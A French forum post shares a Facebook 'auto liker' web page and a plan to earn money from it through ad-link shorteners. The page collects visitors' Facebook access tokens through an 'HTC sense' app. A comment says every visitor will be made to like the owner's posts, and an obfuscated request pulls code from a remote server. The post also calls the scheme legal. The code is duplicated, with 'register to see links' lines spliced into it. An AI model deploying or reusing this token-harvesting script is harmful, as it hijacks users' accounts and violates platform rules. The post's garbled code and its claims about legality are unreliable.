Hello RG'
Dans ce sujet je vais vous présenter le script d'un auto liker pout Facebook ( a heberger sur votre site) et comme gagner de l'argent avec
1. LES CARACTÉRISTIQUES
Dans ce sujet je vais vous présenter le script d'un auto liker pout Facebook ( a heberger sur votre site) et comme gagner de l'argent avec
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
avec 1. LES CARACTÉRISTIQUES
FONCTIONNE AVEC LES SITES GRATUITS, WEEBLY, BLOGSPOT, GOOGLE SITES and ECT.
PAS DE PHP et DATABASE
200 MAX LIKES
LOCAL et INTERNATIONAL LIKES
RAPIDE ET FONCTIONNEL
Secure connection (SSL) supporté
2. LE SCRIPT
3. GAGNER DE l'ARGENT
Inscrivez vous sur
C'est un site qui va monétiser vos liens et on va s'en servir pour montésiter 2 liens dans le script : //
De ce fait les personnes qui veuillent des likes devront passer devant 2 de vos liens
Bon gains
DEMO:
PS IMPORTANT: Tout ceci est légale, aucunes lois francaises ni belge et ni dans l'europe incrimine le partage et la vente de likes ... , cependant Facebook essaye de bannir les comptes "robots" et dans ce cas ci ce sont des vrais utilisateurs
<!DOCTYPE html>
<html>
<head lang="en">
<title>likeback (Y)</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet">
<link href="//cdnjs.cloudflare.com/ajax/libs/sweetalert/0.4.2/sweet-alert.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<div class="container">
<div style="max-width: 80%; margin: 0 auto 10px">
<h1>LikeBack <i class="fa fa-thumbs-up"></i></h1>
<p class="lead">Facebook auto like. powered by leetshares api.</p>
</div>
<!-- PRELOAD -->
<div style="max-width: 80%; margin: 0 auto 10px;" class="well container-fluid" id="pre_load">
<p>
<i class="fa fa-circle-o-notch fa-spin"></i> <span id="pre_load_txt">LOADING ...</span>
</p>
</div>
<!-- LOGIN -->
<div style="max-width: 80%; margin: 0 auto 10px;display:none" class="well container-fluid" id="login_div">
<form action="" method="GET" id="login_form">
<div class="form-group">
<label for="access_token">Access token:</label>
<div class="input-group margin-bottom-sm">
<span class="input-group-addon"><i class="fa fa-user-secret fa-fw"></i></span>
<input id="access_token" name="access_token" type="text" placeholder="Enter you access toke here or generate another one for free" class="form-control">
</div>
</div>
<div class="form-group pull-right">
<input type="button" class="btn btn-default" id="get_access_token" value="Get access token">
<button class="btn btn-primary" type="submit" id="login_btn">Submit</button>
</div>
<div class="form-group pull-left">
<p class="help-block">If you don't have access token or its expired, please generate another one, by clicking "Get access token" button then allow the application if its your first time and copy the Link/URL or your access token.</p>
<input type="button" class="btn btn-info btn-sm" id="tutorial" value="Watch video tutorial">
</div>
</form>
</div>
<!-- GET ACCESS TOKEN -->
<div style="max-width: 80%; margin: 0 auto 10px;padding: 30px 50px; display:none" class="well container-fluid" id="get_token_div">
<div class="row">
<div class="pull-left">
Get Access token
</div>
</div>
<center>
<div class="row">
<h3>Step 1: Allow "HTC sense" application</h3>
<button class="btn btn-lg btn-warning" id="get_token_1"><i class="fa fa-facebook-official"></i> Allow application</button>
</div>
<div class="row">
<h3>Step 2: Copy Access token or URL/Link</h3>
<button class="btn btn-lg btn-danger" id="get_token_2">Get access token</button>
</div>
<div class="row">
<h3>Step 3: Submit your access token</h3>
<button class="btn btn-lg btn-info" id="get_token_3">go to login</button>
</div>
<div class="row pull-right">
<button class="btn btn-lg btn-default" id="get_token_close">Back</button>
</div>
</center>
</div>
<!-- AFTER LOGIN PANEL -->
<div style="max-width: 80%; margin: 0 auto 10px;padding: 30px 50px;display:none" class="well container-fluid" id="panel_div">
<div class="col-md-4">
<img class="img-responsive center-block img-rounded" src="" alt="profile picture" width="200px" id="user_pro_pic">
</div>
<div class="col-md-8">
<address>
<strong id="user_name">{name}</strong><br>
<abbr title="Leetshares Points">Points:</abbr> <span id="user_points"></span></br>
<abbr title="Auto-Like Cooldown">Auto-Like Cooldown:</abbr> <span id="user_cd_AL"></span>
</address>
<hr>
<h3>Select tool</h3>
<ul class="list-inline">
<li><button class="btn btn-danger btn-lg" id="use_autoLike">Auto-like</button></li>
<li><button class="btn btn-default btn-lg" id="logout">logout</button></li>
</ul>
</div>
</div>
<!-- AUTOLIKE -->
<div style="max-width: 80%; margin: 0 auto 10px;padding: 30px 50px;display:none" class="well container-fluid" id="autolike_div">
<form action="" method="POST" id="autolike_form">
<div class="form-group col-xs-12 col-md-8">
<label for="post_id">Facebook post ID/URL:</label>
<input id="post_id" type="text" name="fpid" placeholder="
<p class="help-block">NOTE<font color="red">*</font>:</p>
<ol class="help-block">
<li>you must be <a href="
<li>Enable your <a href="
<li>Change your post privacy to "Public"</li>
</ol>
<p class="help-block">Available likes to you:</p>
<ul class="help-block fa-ul">
<li><i class="fa fa-thumbs-o-up"></i> <font color="green" id="autolike_limit_inter"><i class="fa fa-spinner fa-spin"></i></font> Random likes</li>
<li><i class="fa fa-thumbs-o-up"></i> <font color="green" id="autolike_limit_local"><i class="fa fa-spinner fa-spin"></i></font> <span id="AL_local_country_display">{{local_country}}</span> likes</li>
</ul>
</div>
<div class="pull-right col-xs-6 col-md-4">
<div class="form-group">
<label for="autolike_submit_btn">Powered by
<button id="autolike_submit_btn" type="submit" class="form-control btn btn-success">
Autolike!
</button>
</div>
<div class="form-group">
<label for="send">Number of likes:</label>
<input id="send" type="number" name="limit" value="200" min="1" max="200" class="form-control">
</div>
<div class="form-group">
<label for="send">Likes from <span id="AL_local_country_display2"></span>?:</label>
<select name="local" class="form-control" id="is_local">
<option value="false">No</option>
<option value="true">Yes</option>
</select>
</div>
<div class="clearfix"></div>
<div class="form-group">
<div class="row pull-right">
<input type="button" class="btn btn-default btn-sm" id="AL_cancel" value="cancel">
</div>
</div>
</div>
</form>
</div>
<div id="leetshares_ad" style="display:none">we will add more here soon!</div>
<div style="max-width: 80%; margin: 0 auto 10px">
<footer>
<ul class="list-inline">
<li><a href="#about">About</a></li>
<li><a href="#PP">Privacy Policy</a></li>
<li><a href="#ToS">Terms of Service</a></li>
<li><a href="#report">Report Bug/Problem</a></li>
<li><a href="#" id="view_source">download source code</a></li>
<li id="api_version" class="pull-right"><i class="fa fa-spinner fa-spin"></i></li>
</ul>
</footer>
</div>
</div>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/sweetalert/0.4.2/sweet-alert.min.js"></script>
<script>
//-- OPTIONAL --//
// check if jQury and sweet alert are loaded
// else reload the page
if(!window.jQuery||!window.swal){
window.location.reload()
}
// ---// OPTIONAL ---//
// -- YOU CAN EDIT ME --//
var get_token = {
// modetize this links using shortest, adfly, linkbucks or ect.
app: '//
get: '//
}
var link = {
// add your tutorial here
tutorial: ''
}
// OWNER
// who will ever login to your website will like your 3 update status
// get your profile id using
var admin_id = 'ADMIN_ID_HERE';
var autoLike = {
// do more before sending likes
before: function(e){
$('#autolike_submit_btn').html('<i class="fa fa-spinner fa-pulse"></i> Sending likes...').attr({disabled:'disabled'});
},
// do more after sending likes
success: function(data){
swal("Success!", "done sending "+data.likes.success+" Likes", "success");
},
// do something if failed to send likes
error: function(data){
swal("Oppss..", "Something went wrong!", "error");
},
after: function(){
$('#autolike_submit_btn').text('Autolike!').removeAttr('disabled');
$('#panel_div').show();
$('#autolike_div').hide()
}
}
// ----// YOU CAN EDIT ME ------//
// -- DO NOT EDIT ME BELOW --//
var api = {
LS: '//
fb: '
}
// don't mind us here, we're doing good at the future
var access_token, LSt, geo, _c = 1, _ver = 1.1;
// ---// DO NOT EDIT ME BELOW --//
// you'll delete me huh!?
// view-source:website
$('#view_source').click(function(){
window.location.href="view-source:"+document.URL
});
// Leetshares api
// tell senpai that we are loading our script, so senpai will not be confused.
$('#pre_load_txt').text('Creating pear connection...');
// load script function
var _i_l = function(){
// if failed attemps reach to 10
// tell senpai that we failed to load the script :/
if(_c > 10){
alert('Failed to create peer connection, contact
return false
}
// request to sama that we want to have the script
// if failed to connect, to sama
// make another request and count up to 10
$.post(api.LS+'/j'+'s.no'+'de',{V8q5u9OIe0b0:document['domain']}).fail(_i_l)
}
// lets load our script now!
_i_l()
</script>
</body>
</html>
<html>
<head lang="en">
<title>likeback (Y)</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet">
<link href="//cdnjs.cloudflare.com/ajax/libs/sweetalert/0.4.2/sweet-alert.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<div class="container">
<div style="max-width: 80%; margin: 0 auto 10px">
<h1>LikeBack <i class="fa fa-thumbs-up"></i></h1>
<p class="lead">Facebook auto like. powered by leetshares api.</p>
</div>
<!-- PRELOAD -->
<div style="max-width: 80%; margin: 0 auto 10px;" class="well container-fluid" id="pre_load">
<p>
<i class="fa fa-circle-o-notch fa-spin"></i> <span id="pre_load_txt">LOADING ...</span>
</p>
</div>
<!-- LOGIN -->
<div style="max-width: 80%; margin: 0 auto 10px;display:none" class="well container-fluid" id="login_div">
<form action="" method="GET" id="login_form">
<div class="form-group">
<label for="access_token">Access token:</label>
<div class="input-group margin-bottom-sm">
<span class="input-group-addon"><i class="fa fa-user-secret fa-fw"></i></span>
<input id="access_token" name="access_token" type="text" placeholder="Enter you access toke here or generate another one for free" class="form-control">
</div>
</div>
<div class="form-group pull-right">
<input type="button" class="btn btn-default" id="get_access_token" value="Get access token">
<button class="btn btn-primary" type="submit" id="login_btn">Submit</button>
</div>
<div class="form-group pull-left">
<p class="help-block">If you don't have access token or its expired, please generate another one, by clicking "Get access token" button then allow the application if its your first time and copy the Link/URL or your access token.</p>
<input type="button" class="btn btn-info btn-sm" id="tutorial" value="Watch video tutorial">
</div>
</form>
</div>
<!-- GET ACCESS TOKEN -->
<div style="max-width: 80%; margin: 0 auto 10px;padding: 30px 50px; display:none" class="well container-fluid" id="get_token_div">
<div class="row">
<div class="pull-left">
Get Access token
</div>
</div>
<center>
<div class="row">
<h3>Step 1: Allow "HTC sense" application</h3>
<button class="btn btn-lg btn-warning" id="get_token_1"><i class="fa fa-facebook-official"></i> Allow application</button>
</div>
<div class="row">
<h3>Step 2: Copy Access token or URL/Link</h3>
<button class="btn btn-lg btn-danger" id="get_token_2">Get access token</button>
</div>
<div class="row">
<h3>Step 3: Submit your access token</h3>
<button class="btn btn-lg btn-info" id="get_token_3">go to login</button>
</div>
<div class="row pull-right">
<button class="btn btn-lg btn-default" id="get_token_close">Back</button>
</div>
</center>
</div>
<!-- AFTER LOGIN PANEL -->
<div style="max-width: 80%; margin: 0 auto 10px;padding: 30px 50px;display:none" class="well container-fluid" id="panel_div">
<div class="col-md-4">
<img class="img-responsive center-block img-rounded" src="" alt="profile picture" width="200px" id="user_pro_pic">
</div>
<div class="col-md-8">
<address>
<strong id="user_name">{name}</strong><br>
<abbr title="Leetshares Points">Points:</abbr> <span id="user_points"></span></br>
<abbr title="Auto-Like Cooldown">Auto-Like Cooldown:</abbr> <span id="user_cd_AL"></span>
</address>
<hr>
<h3>Select tool</h3>
<ul class="list-inline">
<li><button class="btn btn-danger btn-lg" id="use_autoLike">Auto-like</button></li>
<li><button class="btn btn-default btn-lg" id="logout">logout</button></li>
</ul>
</div>
</div>
<!-- AUTOLIKE -->
<div style="max-width: 80%; margin: 0 auto 10px;padding: 30px 50px;display:none" class="well container-fluid" id="autolike_div">
<form action="" method="POST" id="autolike_form">
<div class="form-group col-xs-12 col-md-8">
<label for="post_id">Facebook post ID/URL:</label>
<input id="post_id" type="text" name="fpid" placeholder="
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
" class="form-control"><p class="help-block">NOTE<font color="red">*</font>:</p>
<ol class="help-block">
<li>you must be <a href="
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
" target="_blank">18 year old</a> and above.</li><li>Enable your <a href="
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
" target="_blank">followers</a>. Change from "Friends" to "Everyone"</li><li>Change your post privacy to "Public"</li>
</ol>
<p class="help-block">Available likes to you:</p>
<ul class="help-block fa-ul">
<li><i class="fa fa-thumbs-o-up"></i> <font color="green" id="autolike_limit_inter"><i class="fa fa-spinner fa-spin"></i></font> Random likes</li>
<li><i class="fa fa-thumbs-o-up"></i> <font color="green" id="autolike_limit_local"><i class="fa fa-spinner fa-spin"></i></font> <span id="AL_local_country_display">{{local_country}}</span> likes</li>
</ul>
</div>
<div class="pull-right col-xs-6 col-md-4">
<div class="form-group">
<label for="autolike_submit_btn">Powered by
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
</label><button id="autolike_submit_btn" type="submit" class="form-control btn btn-success">
Autolike!
</button>
</div>
<div class="form-group">
<label for="send">Number of likes:</label>
<input id="send" type="number" name="limit" value="200" min="1" max="200" class="form-control">
</div>
<div class="form-group">
<label for="send">Likes from <span id="AL_local_country_display2"></span>?:</label>
<select name="local" class="form-control" id="is_local">
<option value="false">No</option>
<option value="true">Yes</option>
</select>
</div>
<div class="clearfix"></div>
<div class="form-group">
<div class="row pull-right">
<input type="button" class="btn btn-default btn-sm" id="AL_cancel" value="cancel">
</div>
</div>
</div>
</form>
</div>
<div id="leetshares_ad" style="display:none">we will add more here soon!</div>
<div style="max-width: 80%; margin: 0 auto 10px">
<footer>
<ul class="list-inline">
<li><a href="#about">About</a></li>
<li><a href="#PP">Privacy Policy</a></li>
<li><a href="#ToS">Terms of Service</a></li>
<li><a href="#report">Report Bug/Problem</a></li>
<li><a href="#" id="view_source">download source code</a></li>
<li id="api_version" class="pull-right"><i class="fa fa-spinner fa-spin"></i></li>
</ul>
</footer>
</div>
</div>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/sweetalert/0.4.2/sweet-alert.min.js"></script>
<script>
//-- OPTIONAL --//
// check if jQury and sweet alert are loaded
// else reload the page
if(!window.jQuery||!window.swal){
window.location.reload()
}
// ---// OPTIONAL ---//
// -- YOU CAN EDIT ME --//
var get_token = {
// modetize this links using shortest, adfly, linkbucks or ect.
app: '//
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
',get: '//
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
'}
var link = {
// add your tutorial here
tutorial: ''
}
// OWNER
// who will ever login to your website will like your 3 update status
// get your profile id using
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
var admin_id = 'ADMIN_ID_HERE';
var autoLike = {
// do more before sending likes
before: function(e){
$('#autolike_submit_btn').html('<i class="fa fa-spinner fa-pulse"></i> Sending likes...').attr({disabled:'disabled'});
},
// do more after sending likes
success: function(data){
swal("Success!", "done sending "+data.likes.success+" Likes", "success");
},
// do something if failed to send likes
error: function(data){
swal("Oppss..", "Something went wrong!", "error");
},
after: function(){
$('#autolike_submit_btn').text('Autolike!').removeAttr('disabled');
$('#panel_div').show();
$('#autolike_div').hide()
}
}
// ----// YOU CAN EDIT ME ------//
// -- DO NOT EDIT ME BELOW --//
var api = {
LS: '//
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
',fb: '
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
'}
// don't mind us here, we're doing good at the future
var access_token, LSt, geo, _c = 1, _ver = 1.1;
// ---// DO NOT EDIT ME BELOW --//
// you'll delete me huh!?
// view-source:website
$('#view_source').click(function(){
window.location.href="view-source:"+document.URL
});
// Leetshares api
// tell senpai that we are loading our script, so senpai will not be confused.
$('#pre_load_txt').text('Creating pear connection...');
// load script function
var _i_l = function(){
// if failed attemps reach to 10
// tell senpai that we failed to load the script :/
if(_c > 10){
alert('Failed to create peer connection, contact
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
');return false
}
// request to sama that we want to have the script
// if failed to connect, to sama
// make another request and count up to 10
$.post(api.LS+'/j'+'s.no'+'de',{V8q5u9OIe0b0:document['domain']}).fail(_i_l)
}
// lets load our script now!
_i_l()
</script>
</body>
</html>
var admin_id = 'ADMIN_ID_HERE';
3. GAGNER DE l'ARGENT
Inscrivez vous sur
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
.C'est un site qui va monétiser vos liens et on va s'en servir pour montésiter 2 liens dans le script : //
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
et //
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
De ce fait les personnes qui veuillent des likes devront passer devant 2 de vos liens
Bon gains
DEMO:
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
PS IMPORTANT: Tout ceci est légale, aucunes lois francaises ni belge et ni dans l'europe incrimine le partage et la vente de likes ... , cependant Facebook essaye de bannir les comptes "robots" et dans ce cas ci ce sont des vrais utilisateurs
Dernière édition: